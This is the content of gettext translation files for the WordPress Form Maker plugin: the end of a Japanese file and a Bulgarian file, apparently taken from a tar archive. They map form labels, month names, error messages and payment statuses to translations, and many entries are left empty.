msgstr "電話番号"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "ドル"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "セント"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "から"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "へ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "行く "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "リセット "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "フィールドを選択します "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "日付を選択"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-bg_BG.po000060400000060464152434416630012150 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:50+0400\n"
"PO-Revision-Date: 2015-05-22 16:51+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: bg\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Улица"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Адрес Ред 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Sofia"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Щат / Провинция / Регион"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Пощенски / Zip код"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Държава"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "януари"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "февруари"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "март"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "април"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Май"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "юни"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "юли"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "август"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "септември"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "октомври"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "ноември"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "декември"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Грешка, неправилно Код за сигурност."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Вашият IP е черна. Моля, свържете се с администратора на сайта. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Файлът превишава допустимия размер на"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "За съжаление, не е позволено да се качите на този тип файл."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Грешка, файлът не може да бъде преместен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Това поле %s изисква уникален влизане и тази стойност вече е изпратена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Грешка, електронна поща не е изпратено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Нищо не беше представен."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Вашият форма е успешно изпратена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Грешка, електронна поща не е изпратено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Вашият имейл адрес е вече проверена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Вашият имейл е успешно проверена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Проверка Вашият имейл приключи."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Проверка на връзката е невалиден."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Полето е задължително."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Това не е валиден имейл адрес."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Не можете да изберете бивши дати. Изберете дата, започвайки от настоящата."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "стойност трябва да бъде между "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "количество "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Вашият резултат трябва да бъде по-малко от "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Наименование"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Първа"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Дата на последния одит. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Среден"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Регионалния код"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Телефонен номер"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollars "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "от "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "за"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "отидете "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Reset "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

